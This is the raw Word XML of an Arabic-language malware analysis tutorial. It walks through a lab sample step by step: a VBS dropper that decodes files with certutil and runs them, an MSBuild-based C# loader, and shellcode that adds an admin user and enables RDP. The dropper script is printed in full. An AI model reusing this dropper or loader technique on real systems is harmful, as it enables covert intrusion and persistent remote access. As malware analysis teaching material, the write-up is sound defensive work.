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1885" w14:textId="77777777" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835FD2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835FD2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malware analysis #1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9193B7" w14:textId="77777777" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835FD2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835FD2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="8899A8"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl/>
        </w:rPr>
        <w:t>بسم الله اليوم بشرح كيف تفحص</w:t>
      </w:r>
      <w:r w:rsidRPr="00835FD2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="8899A8"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve"> shellcode </w:t>
      </w:r>
      <w:r w:rsidRPr="00835FD2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="8899A8"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl/>
        </w:rPr>
        <w:t>و تقدر تفهم وش يسوي البرنامج الضار</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DC8E74" w14:textId="77777777" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835FD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480" w:lineRule="atLeast"/>
        <w:jc w:val="righ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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835FD2"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  <w:t xml:space="preserve">الحين نبدأ بتحليل البرنامج الضار </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0351A9BF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​</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00835FD2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>تحميل الملف</w:t>
        </w:r>
      </w:hyperlink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password:infected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نفك الضغط بعدها تطلع لنا 3 ملفات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one.crt,two.crt,crtupdate.vbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE9C14D" w14:textId="77777777" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835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crtupdate.vbs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A99AAB" w14:textId="77777777" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835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Dim WshShell, oExec Set WshShell = CreateObject("WScript.Shell") Set oExec = WshShell.Exec("certutil -decode one.crt C:\Users\Public\Documents\one.vbs") WScript.Sleep 1000 Set oExec = WshShell.Exec("certutil -decode two.crt C:\Users\Public\Documents\xml.xml") WScript.Sleep 1000 Set oExec = WshShell.Exec("cmd.exe /c C:\Users\Public\Documents\one.vbs")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9F47B2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البرنامج بيفك التشفير عن الملفين الثانيين و بيشغل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one.vbs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228E4CA3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>انا مشغلة في فيرشوال ماشين ف عادي اني اشغل البرنامج ماراح يضرني او ممكن تحط كومنت عند جزئية التشغيل اللي هو السطر الاخير, بعد ما اشغله البرنامج بيفك التشفير عندهم و بيحط الملفات بهذي المسارات</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481EBBF1" w14:textId="77777777" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835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C:\Users\Public\Documents\one.vbs C:\Users\Public\Documents\xml.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1CE544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الحين نشوف ملف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one.vbs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نشوف الكود </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15943DF1" w14:textId="511FBE27" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835F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35FD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AD8C65C" wp14:editId="2C04D9AE">
            <wp:extent cx="5731510" cy="151511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1107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خلونا نشوف الكود وش يسوي فيه فنكشن اسمها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update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وظيفتها تسوي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replace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vVv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ولا شي عندي حلين يا اشغلة و اطبع المتغيرات او اني اسوي بنفسي و بسويها بنفسي اسهل ببدل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vVv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 ولاشي</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AF2884" w14:textId="3A775E51" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835F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35FD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93E79BC" wp14:editId="7B7B0B8F">
            <wp:extent cx="5731510" cy="2580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03E2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هذا بعد ما ضبطناه و طلعت لنا مسارات و الواضح انه بيشغل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MSBuild.exe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بيحط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xml.xml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طيب خلونا نشوف وش فيه هناك </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754BA3DB" w14:textId="147562D1" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835F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35FD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CD0FD1F" wp14:editId="21D571A4">
            <wp:extent cx="5731510" cy="2491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EF95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هنا فيه كود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C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># و فكرة البرنامج يشغل الشل كود</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C91E0A" w14:textId="77777777" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835FD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835FD2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فحص الشل كود</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9249A9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>باخذ الشل كود من الملف و نفحصة الحين عشان نفهم وش يسوي</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D20C50A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>بعد ما شلنا الفاصلات و 0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x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لأننا ما نحتاجهم</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D33F902" w14:textId="77777777" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835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fce8820000006089e531c0648b503......</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE49C8A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الحين نحفظة في ملف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txt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مثلا و نشغل اداة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scdbg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نقدر نعرف وش قاعد يسوي الشل كود</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265639AB" w14:textId="6868F8A0" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835F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835FD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88B6BED" wp14:editId="3D8D14EF">
            <wp:extent cx="5731510" cy="912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1F4D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هذا هو الشل كود و زي ماتشوفون بيضيف يوزر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wdsadmin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بيفتح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rdp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7490A011" w14:textId="77777777" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835FD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835FD2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الملخص</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5996DF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 xml:space="preserve">اكتشفنا ان ملف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vbs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بيفك ملفين متشفرة واحد ملف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vbs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اللي بيشغل البرنامج من </w:t>
      </w:r>
      <w:r w:rsidRPr="00835FD2">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="3B454E"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MSBuild.exe</w:t>
      </w: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الثاني اللي فيه المحتوى و شفنا المحتوى حقه و واضح انه بيشغل الشل كود في الميموري و بعدها فحصنا الشل كود و قدرنا نعرف وش كان يسوي البرنامج</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FDDC06" w14:textId="77777777" w:rsidR="00835FD2" w:rsidRPr="00835FD2" w:rsidRDefault="00835FD2" w:rsidP="00835FD2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835FD2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ياليت التحليل اعجبكم و اذا فيه اي خطأ اعتذر و ياليت تنبهوني عشان اعدلها </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB2692E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0E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370E"/>
    <w:rsid w:val="007956E0"/>
    <w:rsid w:val="007B41C8"/>
    <w:rsid w:val="007D3A15"/>
    <w:rsid w:val="007E6CC5"/>
    <w:rsid w:val="00835FD2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6B79"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{07E66223-BCED-4D55-B0E6-938736CE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5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5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5F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F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835FD2"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00835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657107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4250864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497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63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094714177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938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3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797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77504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06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20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4514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38118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902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24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262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1431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0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707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3869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056270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87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471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673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254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3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5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988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876645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4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070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248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80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40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4145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791239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327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31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18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915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4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169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696298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229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25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356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225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7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63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3237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608891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752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16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223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68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3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67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1830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8471504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293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295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32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3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9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149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0568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23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12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618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343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3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4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8108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743608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707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105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5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7096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674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1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18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885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2168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4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17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70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497268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977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915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036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052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6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998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15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000154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494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94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820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6566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620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33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52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259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1361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48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431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750563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636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301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316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394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8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71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906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310949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78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646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289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1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5251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1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10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7700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788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4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111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4150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7516638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657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448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57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807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0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92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4087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372318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141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8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320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235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739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369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012417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675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005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833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2219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3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13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9399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624873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83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372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930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5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75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0649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960909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9152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15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63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9176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6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144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325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366831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635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1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686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65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8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69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563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496072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8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288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898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14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73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7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6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9609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4149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3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878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6320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6365802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1006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81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938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275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4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5020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797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3851554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55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558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75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64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7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1174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065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6363603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228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270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4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9088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1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9704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234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3186447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418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22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67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595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uskyHacks/PMAT-labs/tree/main/labs/3-3.OffScript-ScriptMalware/VB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2023-01-09T17:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-01-09T17:15:00Z</dcterms:modified>
</cp:coreProperties>
</file>